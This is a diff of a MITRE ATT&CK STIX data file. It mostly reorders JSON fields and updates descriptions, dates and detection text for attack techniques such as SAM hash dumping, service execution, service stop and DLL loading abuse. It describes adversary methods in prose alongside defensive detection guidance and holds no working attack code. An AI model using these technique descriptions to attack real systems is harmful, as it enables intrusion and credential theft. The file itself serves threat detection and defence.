- ],
- "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.",
- "x_mitre_network_requirements": true,
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.",
+ "x_mitre_data_sources": [
+ "Netflow/Enclave netflow",
+ "Process use of network",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -23319,19 +24204,19 @@
],
"modified": "2020-03-24T19:56:37.627Z",
"created": "2017-05-31T21:31:25.060Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_detection": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.1",
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"File monitoring"
],
- "x_mitre_version": "1.1",
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--2892b9ee-ca9f-4723-b332-0dc6e843a8ae",
@@ -23396,24 +24281,24 @@
],
"modified": "2020-03-23T12:23:04.955Z",
"created": "2020-01-24T13:51:01.210Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Bartosz Jerzman"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.",
"x_mitre_data_sources": [
"File monitoring",
"Windows Registry",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Bartosz Jerzman"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"revoked": false,
@@ -23469,28 +24354,28 @@
],
"modified": "2020-03-30T13:39:24.852Z",
"created": "2017-05-31T21:30:51.733Z",
- "x_mitre_deprecated": true,
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "Process monitoring",
- "File monitoring",
- "Process command-line parameters"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nAnalyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)",
"x_mitre_defense_bypassed": [
"Process whitelisting",
"Data Execution Prevention",
"Exploit Prevention"
],
- "x_mitre_detection": "Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nAnalyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "File monitoring",
+ "Process command-line parameters"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_deprecated": true
},
{
"external_references": [
@@ -23521,22 +24406,22 @@
],
"modified": "2020-03-25T15:17:30.640Z",
"created": "2020-02-11T18:42:07.281Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.",
- "x_mitre_permissions_required": [
- "SYSTEM"
+ "x_mitre_contributors": [
+ "Ed Williams, Trustwave, SpiderLabs"
],
"x_mitre_data_sources": [
"Process command-line parameters",
"PowerShell logs",
"Process monitoring"
],
- "x_mitre_contributors": [
- "Ed Williams, Trustwave, SpiderLabs"
+ "x_mitre_permissions_required": [
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -23560,6 +24445,11 @@
"source_name": "mitre-attack",
"external_id": "T1518.001",
"url": "https://attack.mitre.org/techniques/T1518/001"
+ },
+ {
+ "source_name": "Expel IO Evil in AWS",
+ "url": "https://expel.io/blog/finding-evil-in-aws/",
+ "description": "Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020."
}
],
"object_marking_refs": [
@@ -23567,7 +24457,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Security Software Discovery",
- "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.",
+ "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)",
"id": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -23576,8 +24466,22 @@
"phase_name": "discovery"
}
],
- "modified": "2020-03-15T01:15:56.113Z",
+ "modified": "2020-06-29T17:32:24.787Z",
"created": "2020-02-21T21:16:18.066Z",
+ "x_mitre_data_sources": [
+ "Stackdriver logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs",
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -23588,17 +24492,6 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring",
- "Process command-line parameters"
]
},
{
@@ -23664,20 +24557,20 @@
],
"modified": "2020-03-25T15:42:48.910Z",
"created": "2020-01-24T17:16:11.806Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
"x_mitre_data_sources": [
"DLL monitoring",
"Windows Registry",
"Loaded DLLs"
],
- "x_mitre_detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--2715c335-1bf2-4efe-9f18-0691317ff83b",
@@ -23748,18 +24641,18 @@
],
"modified": "2020-02-17T13:16:53.850Z",
"created": "2020-02-12T18:56:31.051Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_data_sources": [
+ "Process monitoring"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.",
"x_mitre_permissions_required": [
"root"
],
- "x_mitre_data_sources": [
- "Process monitoring"
+ "x_mitre_detection": "Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
]
},
{
@@ -23789,27 +24682,27 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-25T23:30:20.871Z",
+ "modified": "2020-04-17T17:47:57.075Z",
"created": "2019-06-28T17:52:07.296Z",
- "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.\n\nProcess monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "root"
+ ],
+ "x_mitre_version": "1.1",
"x_mitre_data_sources": [
"Netflow/Enclave netflow",
"Process monitoring",
"File monitoring",
"Application logs"
],
- "x_mitre_version": "1.1",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "root"
- ],
- "x_mitre_platforms": [
- "Windows",
- "Linux",
- "macOS"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.\n\nProcess monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) "
},
{
"id": "attack-pattern--f44731de-ea9f-406d-9b83-30ecbb9b4392",
@@ -23827,6 +24720,22 @@
"created": "2017-05-31T21:30:36.550Z"
},
{
+ "created": "2020-03-10T18:33:36.159Z",
+ "modified": "2020-03-28T18:52:02.384Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\n\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.",
+ "name": "Service Execution",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -23844,22 +24753,6 @@
"source_name": "Russinovich Sysinternals"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Service Execution",
- "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\n\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.",
- "id": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-28T18:52:02.384Z",
- "created": "2020-03-10T18:33:36.159Z",
"x_mitre_platforms": [
"Windows"
],
@@ -23921,6 +24814,20 @@
],
"modified": "2020-03-29T01:52:53.947Z",
"created": "2020-02-20T15:31:43.613Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
+ "x_mitre_data_sources": [
+ "Netflow/Enclave netflow",
+ "Network device logs",
+ "Network intrusion detection system",
+ "Web application firewall logs",
+ "Web logs",
+ "SSL/TLS inspection"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -23931,21 +24838,7 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_data_sources": [
- "Netflow/Enclave netflow",
- "Network device logs",
- "Network intrusion detection system",
- "Web application firewall logs",
- "Web logs",
- "SSL/TLS inspection"
- ],
- "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
"id": "attack-pattern--39a130e1-6ab7-434a-8bd2-418e7d9d6427",
@@ -23988,6 +24881,13 @@
"created": "2017-05-31T21:30:49.119Z"
},
{
+ "id": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)",
+ "name": "Service Stop",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "T1489",
@@ -24010,13 +24910,6 @@
"description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Service Stop",
- "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)",
- "id": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -24024,8 +24917,9 @@
"phase_name": "impact"
}
],
- "modified": "2019-07-18T19:18:32.674Z",
+ "modified": "2020-07-14T19:34:47.636Z",
"created": "2019-03-29T19:00:55.901Z",
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Windows"
],
@@ -24083,29 +24977,29 @@
],
"modified": "2020-03-26T19:37:28.912Z",
"created": "2020-03-12T20:43:53.998Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Travis Smith, Tripwire",
+ "Stefan Kanthak"
],
- "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_effective_permissions": [
- "SYSTEM",
- "Administrator",
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Process command-line parameters",
"Services",
"File monitoring"
],
- "x_mitre_contributors": [
- "Travis Smith, Tripwire",
- "Stefan Kanthak"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "SYSTEM",
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ",
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -24163,32 +25057,32 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-26T19:43:33.981Z",
+ "modified": "2020-06-20T22:01:09.906Z",
"created": "2020-03-13T11:42:14.444Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Application control"
],
- "x_mitre_contributors": [
- "Travis Smith, Tripwire",
- "Matthew Demaske, Adaptforward"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "SYSTEM"
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
"x_mitre_data_sources": [
"Windows Registry",
"Services",
"Process command-line parameters"
],
- "x_mitre_detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
+ "x_mitre_contributors": [
+ "Travis Smith, Tripwire",
+ "Matthew Demaske, Adaptforward"
],
- "x_mitre_effective_permissions": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "Process whitelisting"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -24254,21 +25148,21 @@
],
"modified": "2020-03-27T00:43:58.149Z",
"created": "2020-01-30T14:11:41.212Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"id": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65",
@@ -24299,24 +25193,24 @@
],
"modified": "2020-03-28T18:14:36.980Z",
"created": "2017-05-31T21:31:40.542Z",
- "x_mitre_version": "2.0",
- "x_mitre_contributors": [
- "Stefan Kanthak"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to %SystemRoot% and %ProgramFiles% directories will protect against module loads from unsafe paths. \n\nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.",
"x_mitre_data_sources": [
"API monitoring",
"DLL monitoring",
"File monitoring",
"Process monitoring"
],
- "x_mitre_detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to %SystemRoot% and %ProgramFiles% directories will protect against module loads from unsafe paths. \n\nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Stefan Kanthak"
],
- "x_mitre_platforms": [
- "Windows"
- ],
